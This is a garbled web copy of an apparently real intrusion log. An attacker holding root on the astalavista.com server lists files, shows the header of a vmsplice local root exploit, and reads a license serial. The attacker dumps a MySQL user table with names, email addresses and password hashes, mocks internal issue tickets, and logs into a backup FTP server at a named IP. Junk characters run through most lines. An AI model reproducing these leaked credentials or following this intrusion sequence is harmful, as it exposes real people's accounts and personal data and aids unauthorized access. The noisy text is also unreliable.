-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
, e! z5 {! p7 J$ zdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
, ?8 G7 I. F7 Q4 M-rw——- 1 com com 21880 Jun 2 08:07 .bash_history) \; Z/ |$ ?/ K7 d/ P. e
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout! |) ?4 H$ W4 H, p9 C
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile9 Z& E, h, \5 c# L0 `6 b0 o3 \
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc' h# q0 l% J% M/ T
drwx–x–x 3 com com 4096 Jan 29 2008 domains
. C) q$ u# m7 j" M3 h) c. z-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed. m5 S7 {6 {# [0 C
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap- i8 A* Q, G$ d( w& r( k' Y
-rw——- 1 com com 69 Nov 18 2008 .lesshst: P, C4 s$ t! A( T* Y6 k* \& c
drwx—— 2 com com 4096 Sep 24 2007 mail
- A5 @* W1 F7 J5 q- W! U-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history$ t4 O1 u( p& K5 q! o
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp) n) C. _) N, j+ d+ t; @
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
# b; H, x9 s p4 v-rw-r—– 1 com mail 34 Sep 24 2007 .shadow8 J0 d" L6 `* p! r% A) M
drwx—— 2 com com 4096 Aug 26 2008 .ssh5 k- q: B; z! B s: q
-rwx—— 1 com com 8515 Feb 10 2008 t
; m9 w& v) |& {* b$ q! e+ {! c-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c0 h$ e% j5 K* g% e: M' \5 r
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
( P: j: ^7 S4 Z; X2 d9 R-rw-rw-r– 1 com com 617 May 20 2008 .toprc7 _; g* A7 n8 c5 {9 `7 Q' T9 _
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
9 I3 d4 i q0 V* c5 k-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
/ G! O, }& ]) q' j-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
( x+ w) z5 f \- W* @2 S
) v! r% a" j# ?( N' `2 P8 Wsh-3.2# head t.c
- Z4 Y: M6 v9 C0 ]5 M& @5 A: e/*
& W7 m( n3 \3 K0 F) [* jessica_biel_naked_in_my_bed.c
% W i( Q4 G0 ~*& r+ q7 e, s% r( r: ], S' Q. h) B
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
0 X- }& \$ ~+ I4 Q; B5 C* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.. `. E4 n9 w- ~- P8 w
* Stejnak je to stare jak cyp a aj jakesyk rozbite.0 z9 w# }% ^* q; q" h$ Y9 `, ^ j
*
, H- U; A. I& L, i7 m* Linux vmsplice Local Root Exploit5 t, h4 |$ s' }) r5 ~5 A
* By qaaz
2 K" _) o/ j' ?. s1 p9 a% m& w1 b. |, }*
+ ]/ b8 Y: f1 y; _/ a5 s
4 T& C; S$ o, ~; |; }sh-3.2# cd /5 |: i- b0 h; b
sh-3.2# ls -la
/ X2 y; e% K) B, _. gtotal 360; R, V- P) f( C4 R/ `
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
, K# Z- Z8 N" }! m6 a m9 B, rdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..4 F7 T- Y1 r: [
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group) Q! t' D& B, ^! d0 B
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
" p- A5 [$ f) o' y3 S- z& p2 ~' _-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
/ B. b) z2 O. g# z3 H+ o-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck6 E8 g1 U1 p! S% @+ O$ ~; q! Z
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
: c5 j- J0 \( N$ Ndrwxr-xr-x 3 root root 4096 Dec 29 2007 backup3 g2 |0 ^, D5 u% K
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin W% l& W7 @3 P- M6 A
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
5 |! ~0 b1 f! x) I v: f7 ~drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
% ~" K! z1 {1 u5 gdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc1 z! ?7 r8 u, A
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
1 Q9 i% O2 X+ I+ Q-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
- N7 N- y9 d+ y, K) G: R9 @% rdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib+ I# A9 A/ s& Z, |
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
( G# m0 k J! ]drwx—— 2 root root 16384 Sep 11 2007 lost+found; e4 F% z, x0 \6 ?" H/ C) X
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media' z- h% R5 I# W
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
0 m% K$ ^" j" M: u- C5 Ydrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt4 r- R- d' T: @
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg1 p& m, t/ d8 J
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
r% s1 z% Z: k, jdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
2 n5 w+ n0 a; T5 zdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
1 r! \' a5 D& N: T* tdrwxr-x— 15 root root 4096 Jun 4 08:40 root
. f( X) l' C( u* @: C# S2 bdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
- b6 [' b1 s! x' n9 j+ fdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux; M# I9 z+ C, t7 Z; S9 T
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
% C; X# t5 p4 y0 e9 e+ z0 K/ a! Idrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
3 n5 A2 D: x+ @0 ^8 sdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp) |6 c. [3 z* E# M! P. b
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
3 V& ]& ^# M4 H8 C# xdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var, P, w# M2 B1 M1 `- S
8 |+ W; m1 O, V3 P- s, _sh-3.2# cd opt1 ]( B: Z# U' L
sh-3.2# ls -la4 H w- g# r' d2 h- [
total 20+ l/ @+ G1 f+ n3 N
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
- `) d% p3 c/ I0 g/ P2 C# {drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
' [/ F0 \! Z; b: idrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
3 ?. M' g$ E# A" |$ D# _8 A* x
( O$ Y9 `) D6 Q' p" F3 Ush-3.2# cd lsws/1 T4 U0 M# f- s6 g5 H: r
sh-3.2# ls -la; ], W/ W7 q, y% F* B b& P
total 108$ k( C G% ?8 A/ W5 o
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
5 l8 P+ x+ u$ Tdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
! ~* b" \/ ?1 [/ P9 Edrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
% r7 ]( M$ D; z D+ a Tdrwxr-xr-x 13 root root 4096 May 29 15:10 admin0 e3 P) W; V, t1 ], A+ @, o/ [; e
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate7 ~, H+ U. V2 P
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
& h7 e/ n, e& F) r a4 K4 }2 Fdrwx—— 4 apache apache 4096 Jun 3 02:43 conf
/ U; s4 [& k2 Mdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
" N) s: ~: m! ^! { `9 R7 [drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
: j4 M& J- |/ o# N9 o; j& qdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin) ~- j, }( K! F6 v. O
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib9 ]) ^0 F6 ~' |. A9 K; p
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
8 O/ f# t0 H" X4 q) S-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP! D8 e1 D/ F4 {5 |0 | c5 {
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL! p# `3 e7 _9 }" z$ Y9 v) y; @; S
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP; s7 j4 v0 U [
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
# w- W7 v) ]- l$ z6 f5 A$ xdrwxr-xr-x 2 root root 4096 Mar 20 2008 php
4 K: L; A8 m2 t( H9 j! rdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
: W0 b5 f$ d; n, ^: d6 z5 ]drwxr-xr-x 3 root root 4096 Mar 20 2008 share: l/ w' }" h* W
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
. z8 f. _6 }* Q9 ]6 c8 O9 J/ C1 g Z
+ a. P) [; B" |& d+ Esh-3.2# cd conf) E$ h8 K* \0 r- Y5 `9 p. U
sh-3.2# ls -la
2 b- `7 l2 p0 ]& J! m. Ktotal 480 E/ X0 C: ~* g0 F) m6 g
drwx—— 4 apache apache 4096 Jun 3 02:43 .
7 N" Z2 j1 c4 [# Udrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
% u5 c" z, ~$ A( X) I4 Z9 V% Ndrwx—— 2 apache apache 4096 Mar 20 2008 cert
8 o) Y! o& Z# R9 V-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
& {: A; \" Q) }# t8 J* Y2 C) O-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak3 E. S! r: C2 r3 i3 i% I7 C; Q
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
4 T. o3 ~/ B; O* l% f o, p2 x-rw——- 1 apache apache 256 May 29 15:10 license.key( [2 R, W6 a, C8 S
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old9 B0 h$ G' [( m& P
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
% @# G$ e; w K3 G' x: D-rw——- 1 apache apache 20 May 29 15:10 serial.no8 i0 L8 f: f% y* [( y
drwx—— 2 apache apache 4096 Mar 20 2008 templates
1 b7 C4 q! _9 A$ k: `5 d/ k+ j, c5 X ^' k
sh-3.2# cat serial.no
7 S2 k5 L, I7 j* v4 TIbDl-oVsO-CKqL-wVRa) y5 Z+ d+ d7 {8 I
5 K3 i2 T4 W/ U5 |! Z2 b1 u( @1 Hsh-3.2# mysql
, m8 z3 A8 E+ y: `: ~$ G% h2 {5 P! HWelcome to the MySQL monitor. Commands end with ; or \g.
/ a8 W1 ^9 g2 R; k, x! [! R( ^Your MySQL connection id is 286844" G- q) x4 Z9 `4 c U1 |
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
& W) q( J& i8 G) w
* J6 }7 Y- D, \: lType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
0 l, T, P; }: Z! u
9 W1 S6 ]/ q, f1 {( H: X8 wmysql> show databases;
5 T, r5 t5 [4 M+———————–+
! ?& | t7 f+ e| Database |. a! |4 E: q2 e/ u4 a
+———————–+
# j; A' s8 a7 d| information_schema |
' m. v9 r& a$ @* Z. M| astanet_ads |2 q" q9 P' Q* }
| astanet_mailing_lists |
N' U; P1 _# [+ C( G| astanet_mediawiki |+ Y1 \& w9 S: w, [* u- T
| astanet_membersystem |) v7 ^$ E$ M5 r* |+ f
| com_contrexx |
7 f. E: \6 q$ W0 o| com_contrexx2 |- N3 d: l9 ~+ q
| com_contrexx2_live |
2 X N- t n' D' t7 i$ E| da_roundcube |
9 }) I: r3 H) t0 H( e| dolphin |" [- ]$ I/ O9 j9 K
| ideapool |1 d! A0 S3 j3 [4 e3 f
| mysql |$ {1 a+ A5 U6 @ j
| test |- b5 R# n4 y! \3 j, ~: }2 M5 N* m! F
| yourmaster |* \0 W% b5 B+ n8 `0 y% o
+———————–+
9 _6 o( g! ]/ u14 rows in set (0.00 sec)4 P: }5 r) Z) X4 {2 h! {
4 l6 c3 g5 o5 d8 H/ N& s) c3 I
mysql> use ideapool4 A- t* J0 V# _; `& l' m5 m
Database changed
2 A/ n1 p* F2 J1 r6 |mysql> show tables;
8 _4 ^6 Y9 b1 u1 A, B, B3 [+ R+———————————–+) C3 i8 X$ N" d p, O6 ]
| Tables_in_ideapool |# C/ A4 u% o" S* T' a1 B! u
+———————————–+
/ c, {/ }% c) E1 J| eventum_columns_to_display |9 ]9 ?4 A% g0 J% z' Q {7 M8 ]
| eventum_custom_field |6 `: f/ u6 U4 T/ z
| eventum_custom_field_option |1 ~6 G7 o+ k8 F% `# h" S
| eventum_custom_filter |
( u7 k% F. ]) b: P| eventum_customer_account_manager |
+ ]5 f4 _, h, c& G+ X| eventum_customer_note |& d9 ]" W( E7 T. Z; N/ w0 q
| eventum_email_account |! \6 |, f# W* B# I2 I
| eventum_email_draft |7 h9 q8 d- k& o
| eventum_email_draft_recipient |
% h; R1 X8 v# j/ E! L6 V" }| eventum_email_response |2 D7 Y+ ~& S, z$ H& U3 B
| eventum_faq |
% i2 l( [* V& r| eventum_faq_support_level |
) V& k8 d5 {3 J: r2 H' Q% O4 [) ~| eventum_group |
' M% p4 p& l) N| eventum_history_type |
. h* {5 D ]' y4 L| eventum_irc_notice |
P; y+ `2 p. _" }| eventum_issue |
* p$ q% ~- i0 N5 V| eventum_issue_association |
4 A3 S/ K! Y( D| eventum_issue_attachment |
- K7 b. ?; B0 J' ?( u d. @| eventum_issue_attachment_file |
% \0 |7 y9 N r! ?, r$ _2 ~; y$ V| eventum_issue_checkin |! b: R( y! g0 K5 _4 h
| eventum_issue_custom_field |8 U" C- x& N, f! x5 N6 l6 Z# ^
| eventum_issue_history |
! o7 z1 y' c( P( s* I q% q| eventum_issue_quarantine |
$ E, D: N& }9 y& d2 X8 a| eventum_issue_requirement |
) t: C# O2 V) m$ [| eventum_issue_user |6 q; \( s$ A9 T* K5 b
| eventum_issue_user_replier |
5 ^* ]& A1 a% |& n| eventum_link_filter |+ e) O0 J2 \8 j/ V
| eventum_mail_queue |
3 o8 Q) x' r7 K, }$ r: w* X; w| eventum_mail_queue_log |
- H0 g& e& `1 R| eventum_news |4 B% x$ }) q4 ]& P- C
| eventum_note |8 X3 T5 E4 w/ a3 E8 e$ d( I$ _
| eventum_phone_support |3 g# I0 B1 |# i) s6 `" B0 N
| eventum_project |4 t. p6 q- a* R5 r" J8 Y) ~' y ]
| eventum_project_category |
* _" w" L+ U3 K. v: ]! y| eventum_project_custom_field |% g: L0 D7 R9 \3 N! e5 F7 B
| eventum_project_email_response |' l* ]5 |3 n U. p
| eventum_project_field_display |4 p4 I) ^# u% A7 M4 z/ [" Q
| eventum_project_group |) s, x0 U) i) u
| eventum_project_link_filter |
* \: I5 Y& w f$ ^* y9 m| eventum_project_news |
) G8 ]$ i" L0 }+ B6 f, r| eventum_project_phone_category |, H7 d$ B& G* z6 U J1 X
| eventum_project_priority |$ K* S+ Y; P! S( p- l1 X
| eventum_project_release |
. P8 G' H4 ?! ^: }, x* @. n! V| eventum_project_round_robin |
+ t3 p9 K4 I# B8 O. f, B6 v4 E% U- E| eventum_project_status |
' _5 ]5 b2 t4 u, [7 j| eventum_project_status_date |
' f0 S) a; ^+ `| eventum_project_user |
3 U. U$ I/ P& f% l| eventum_reminder_action |
! o9 @& b# o$ F8 e| eventum_reminder_action_list |) t5 D! ` ~; ] S) {- G: Q4 ]
| eventum_reminder_action_type |
% V% q9 }, \1 n5 r% c N7 w| eventum_reminder_field |* b! C1 K# W+ s
| eventum_reminder_history |3 E+ P# [* |( L K
| eventum_reminder_level |8 m- m( `# |. H) U- m* }# y
| eventum_reminder_level_condition |& F3 t: O8 a0 o; c
| eventum_reminder_operator |
/ C1 i6 E! i' p, {$ n| eventum_reminder_priority |2 u2 _& B2 X+ L" n8 B* j
| eventum_reminder_requirement |
5 M% ^; x; {1 X| eventum_reminder_triggered_action |
9 n* B9 \3 M( Z7 }" R| eventum_resolution |
% e6 l6 P8 A7 e5 L/ H# K| eventum_round_robin_user |
9 s0 t* X/ F u) q' w| eventum_search_profile |) k6 F/ F& [1 e% {& J/ Q6 ~( w
| eventum_status |; S, Q9 f, c; @3 T2 g5 p
| eventum_subscription |
& n, I# V4 k. U& ], [1 q| eventum_subscription_type |
% e" P+ Y/ o. l; y9 T2 P" x: c| eventum_support_email |- L! o8 U: V3 W/ Y
| eventum_support_email_body |4 D b& o' ]. }. v% Y' E
| eventum_time_tracking |$ K1 m# B T9 A$ f( C# ~5 T1 h
| eventum_time_tracking_category |
6 W+ W# H, y' j" @9 D| eventum_user |, Y: ~1 B! A% Y0 U
+———————————–+
8 t4 o( z9 k+ p1 m# w69 rows in set (0.00 sec)
' f8 N, W7 O; _2 D6 @7 @' L6 V/ E2 W8 m
mysql> describe eventum_user;
3 t) m( e; y1 u8 D) I) B+————————-+——————+——+—–+———————+—————-+2 ~# r: v8 Q n, e# {- g9 Z
| Field | Type | Null | Key | Default | Extra |6 f8 Y$ q) ~) ?3 K j
+————————-+——————+——+—–+———————+—————-+; J3 E$ d; ~) n0 W h& T4 B' t
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
% V0 L1 _2 _; J3 T8 Q* a$ i, S( I| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
, e z' ?3 n- \7 ?$ x* [9 P- g6 y' w| usr_customer_id | int(11) unsigned | YES | | NULL | |
" s: V- M6 u) y* N& m1 h2 w| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |3 Q6 o V* J: D& T6 g
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
, B. x+ E$ d) K1 X7 T0 R1 b| usr_status | varchar(8) | NO | | active | |. e( u5 T9 e$ c8 C% b9 c7 ^
| usr_password | varchar(32) | NO | | | |9 Z0 o5 ]' ~* W G9 h. ^2 S
| usr_full_name | varchar(255) | NO | | | |
% k6 S& j' q% E5 I$ k- {| usr_email | varchar(255) | NO | UNI | | |
5 R; g+ o+ [4 f! w| usr_preferences | longtext | YES | | NULL | |8 q e7 V% t2 Y6 u8 n- A: Y
| usr_sms_email | varchar(255) | YES | | NULL | |
- ^- N) Y( t: i! r2 n; f' h| usr_clocked_in | tinyint(1) | YES | | 0 | |& ~- `# V# g5 _; G1 i3 W
| usr_lang | varchar(5) | YES | | NULL | |
; m& ]; I% X( ]- {& d* ^! @! ^+————————-+——————+——+—–+———————+—————-+5 z1 f/ C# k$ s* w) J) H
13 rows in set (0.00 sec); |$ X3 j1 H" k" y7 k+ z! |
# K% O4 A& m! J8 C0 E- U, T
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
& x7 d. |0 t' a# b+ _" _+———————-+——————————-+———————————-+9 h! e6 P8 j3 g' _5 E- g
| usr_full_name | usr_email | usr_password | [+ z7 ^# j7 S" d; d2 |, O
+———————-+——————————-+———————————-+( l- `+ _, u7 S8 j, W7 @: @
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
; Y8 i0 x, O) C$ O* j" f- x' {; ?| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
& r5 @% j6 p$ W( K1 f6 b: b| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
1 J- d T" ^5 f$ S% R| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
* r* j; F8 q# _- M| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |) O* H- W% o5 ]* t) Y
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
6 p( b+ ?2 u/ B| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
8 z0 Q" H& l$ o/ E% q! A6 }| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
* s& \3 h7 ^. V1 @& B| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |- x& `9 ?8 t' z: B9 j
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |0 `% `- D8 X+ ^5 \9 [4 @
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
' ]% n- V3 B% g& Z, F| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |0 U, l* J% B& v. C
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
9 l x' a# t0 u( h) d. s8 y# Y9 P| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |, ]1 N8 F y, x8 L' ^ k8 e/ t L
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |' [6 m/ K+ A! R5 h
+———————-+——————————-+———————————-+; y2 V( A& H$ L* {
15 rows in set (0.00 sec)8 |3 A; o' Z0 o5 J. h1 K
9 b9 n! u$ Q# L; mmysql> select iss_description from eventum_issue where iss_id = 43;: S" h/ q& k, d% T' j3 j4 y
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+" R9 s$ v6 u" q1 j
| iss_description
. U2 a; Z4 X) Q2 y$ k& J3 P|$ Y# u X! i3 m* {' Q1 S) f
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+/ l* Q# U( k# S% ?, r0 D
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
; j7 u+ g2 a0 yconnected for 90 mins… 120mins… so what i propose is something like:
! m" n3 j% B# N0 V: F. |' q链接标记[url]http://www.surfthechannel.com/[/url]
3 y& W8 ~8 t- G ^/ i* h7 `since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
8 \6 j9 u! l& }4 c; h" U$ Tlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
$ Y# {1 f/ L3 N% B! a( ]break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
8 ^/ a7 c# _+ |if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
/ y; \3 Z |# F& Q# g7 ]1 W* T- ~6 }* v ~4 p$ I$ O
We could also put advertisement during play on the flash video player itself… extra $$…4 H! O+ I# r$ A5 G. \
# I) t/ ?" k( L. _. p2 t. T
By sykadul |
" O, P2 h9 c2 G' Y, z- q, n6 m- A+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+8 J5 B4 L% V B/ ^" T$ q6 z2 M
1 row in set (0.00 sec)
; r/ Q$ t& z" G# I0 T- g2 a% A# G8 v0 U0 K+ V1 N
// Money and extra $$ is all they care about. remember that.( J& f8 R j$ H J, t
) h4 Q. i* [% x! ~. J$ z$ `
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
4 X w* @ a y+————————+——————————————————————————————————————————————————————————————————————————————-+" V) V7 U5 i( K3 u1 J4 F$ I
| iss_summary | iss_description ! G; C& T! V. L
|: ?4 K& J/ T8 T3 ]3 x! u
+————————+——————————————————————————————————————————————————————————————————————————————-+! N: }" e: N* ^
| Forum for REAL EXPERTS | Hello,
, z" G" @3 J6 b% q5 S! M s1 C
( E4 p' ]. m$ JIshtus and I,% I" ?2 `! b" p$ w
' X" [; j8 k7 h& _Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
% [& ?" S, ~1 q) r- AONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
/ }2 u. }/ Q0 o0 y) O& a$ w! G
3 e9 A$ f0 o6 K3 ?8 q* ^$ oOne example a friend of mine from coresecurity.com!
! M) Z$ q) c4 Y7 I1 J& z1 L! K
8 Q, Q* G8 u. h/ ^% RWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..; o* t; {- @/ O: l
' \$ T6 z( I* b4 y- C) n6 {7 o3 s( }
|* ^& ~' o" z! ^: }3 S0 [
+————————+——————————————————————————————————————————————————————————————————————————————+( _: h( B4 @8 f' u
1 row in set (0.00 sec)- g, F) s1 [: W6 f
- ]' [+ m) k7 A
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
. l3 z, b! a# {: X. k4 A4 I% _% |3 B! A! X& P2 a6 y+ W
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
$ j. {" y7 p: S4 z' N0 m. q. \+——————+———————————————————————————————+0 V: Z) @% c, E& n) Q9 d
| iss_summary | iss_description |
6 c0 L" \) X" N8 ?# Z+——————+———————————————————————————————+
# R& j# t1 Q. j I4 t6 S% N( X- z: @| Website guidance | Virtual Girl which guides you trought the website.
/ S" s/ E4 ~' z# c9 v' C2 }; v2 K; }' R; S, g- K
We need a girl with who you can ( talk )!!!
3 s" ^# @! n3 [+ P- Q# A! R( @, BAlso for the News!
4 {% `; Q! a# K3 z, f7 X9 y( f0 NSo my suggestion is a girl who read you the news loud if you like!9 L a2 C9 ` P4 I9 V( b
you can choose between read yourselfe or she read it for you or both!% O6 h4 m- [' _. j
% I w1 ~+ `+ M+ ?
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!2 `+ j* V; ?4 C% A7 ~# ] V8 H
9 s/ g$ Y& V' Y a0 U$ k1 x; ^* JHave a look on the example girls!!% n+ q) X- f/ T
- ^4 X: S' {" r# t链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]$ }( @8 ^7 w2 e/ }
, ?( k* x5 I( P. @2 jor that
3 r* M, A* \/ A! j/ h# n/ E! \' U8 D/ `0 ~. f3 v/ D
链接标记[url]http://www.yellostrom.de/[/url]6 B% q1 _- @0 Z, U* @
0 P' w$ L1 Y0 ~( }' k3 f& J- |# N$ ^|/ x! Z' S" g! [" X# ?) z
+——————+———————————————————————————————+, ~$ H1 w' C# K
1 row in set (0.00 sec)1 n2 w6 [4 C1 c5 G( F3 |
1 R1 Q0 e0 X* [0 X" `4 e7 T6 t// ha ha.
" i' w3 b7 z4 }" @# ?* `, r4 m* N, _- Y
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
' F/ v. a. I0 X4 r" n6 j0 K- r6 G+————————–+———————————————————————————————————–+
( s, m* g- A$ C) t. ]: T% I| iss_summary | iss_description |
; e! L) \7 S2 M6 D5 U, L+————————–+———————————————————————————————————–+
- n; R3 M. P* ? U% G' ^7 D" @) q+ }| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |9 S) |, N% w7 p, h; c
+————————–+———————————————————————————————————–+
" z% m1 H) @/ N4 T% m* V8 s1 row in set (0.00 sec)7 C1 m4 ^% D6 g1 m
h, S$ ]- I0 a4 f$ w |( f' a. d' J// LOL." ~: `1 J5 |& t/ {' F/ h7 t4 C
5 d" e; V/ M4 Y, G; R6 x6 q
mysql> exit- H" [% \% S4 S6 P0 v
Bye! S4 S# V# K6 H3 v+ `
J* e8 U4 l( @7 u& z: X/ H! X$ Qsh-3.2# ftp 212.254.194.163
9 s! {4 E. d' [# TConnected to 212.254.194.163.3 B* Q+ ~; f: \# p
220 BackupCOM_VW FTP server ready.) V1 E1 ?: J3 L* t: }4 p2 ^
504 AUTH: security mechanism ‘GSSAPI’ not supported.! d; r1 t+ P h3 E i* G
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
. k/ ^2 A N* P5 l$ m o0 IKERBEROS_V4 rejected as an authentication type+ D- B# V/ y; E5 w4 ^
Name (212.254.194.163:root): astalavista.com/ L, h3 A; m6 D* _
331 Password required for astalavista.com., ]3 O3 |1 s1 i; ^3 B. d' H
Password:% {5 p# R2 y% c" G# P# a
230 User astalavista.com logged in.
, s/ U5 S1 e: Q. sRemote system type is UNIX.; {+ Q5 f, a, t* c& p6 k
Using binary mode to transfer files.
- j9 ~/ w S, c( q7 cftp> ls -la
5 i( h" Q- K' C! ?3 F227 Entering Passive Mode (212,254,194,163,2,188): G8 z( |* P: b+ o4 P& U5 S
150 Opening BINARY mode data connection for ‘file list’.
; e2 _5 b' X, F( f# Z4 V3 ~7 d2 kdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com8 M+ Z) p* h; R; p6 m6 L" x
226 Transfer complete.0 L# T4 `4 R2 U
ftp> cd astalavista.com1 x: e E" m' K1 J. A9 E8 t
250 CWD command successful.
+ b2 ~0 `- l% z4 E0 Gftp> ls -la
1 x/ b1 ^% ^8 p227 Entering Passive Mode (212,254,194,163,2,189)
5 P$ U6 S+ R, O5 @; ]150 Opening BINARY mode data connection for ‘file list’.
; i4 @1 _( v$ R1 z-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar, ]4 F. a Z. D1 U' L; c
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
' F) ^9 d! _8 I; i-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
